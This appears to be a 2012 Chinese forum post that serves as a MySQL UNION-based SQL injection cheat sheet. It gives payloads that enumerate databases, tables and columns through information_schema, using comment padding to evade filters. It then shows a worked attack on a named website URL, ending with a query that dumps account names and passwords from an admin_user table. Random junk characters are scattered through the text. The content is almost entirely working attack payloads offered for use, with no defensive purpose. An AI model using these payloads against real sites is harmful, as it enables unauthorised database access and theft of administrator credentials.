查库( |" `$ m- Z; z5 s
- y* {2 D! H+ {- K
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*/ g5 ]7 n8 X" [# }1 Z2 m
8 J) }4 q! I; C& X" W. ^8 s
查表
; Y8 H6 [1 S+ l" @- R7 G. X* X0 j- q" t6 V W
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,16 z2 i' \5 z7 n! H
2 F) G& ^! y1 K" Z
查段
+ q, ^7 u8 ^. s
- G8 L4 P* V- E- K" _id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
/ n! N% Y6 q, _
! W& R' p& O f% q6 y6 O d* L
# ]% P& R4 Y( qmysql5高级注入方法暴表
5 ]! u* t4 X8 t# g1 _: ]& Y t8 i3 P5 d% B ?5 \
例子如下:$ X9 V, @( Y* e: {3 Y6 i
# u$ y' x* [( P1.爆表
8 q7 @7 S# P* l3 J# vhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet); }! D; f( w( t, `0 v: p. s
这样爆到第4个时出现了admin_user表。6 [( U. z( a7 \- [/ \5 }7 ?3 u
% n1 V/ P$ E9 ]9 Y! G% `* t2.暴字段- v! j! R# ^% Z3 C5 E0 E8 D
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*9 ~7 o/ Z& M/ c: E% L
9 |- K/ o$ ^" k' t4 f# l" S) G
: J C4 y ?8 R% l( v" Y3.爆密码
) c6 q2 q# K% `" K/ Bhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
i4 d8 b4 @( t- x" i- O* c/ V) J& |4 I( W# J% y" G/ U
, a6 x% c. {- t0 v( m0 u0 a* Y9 i
|
发表于 2012-9-13 16:29:37
收藏
支持
反对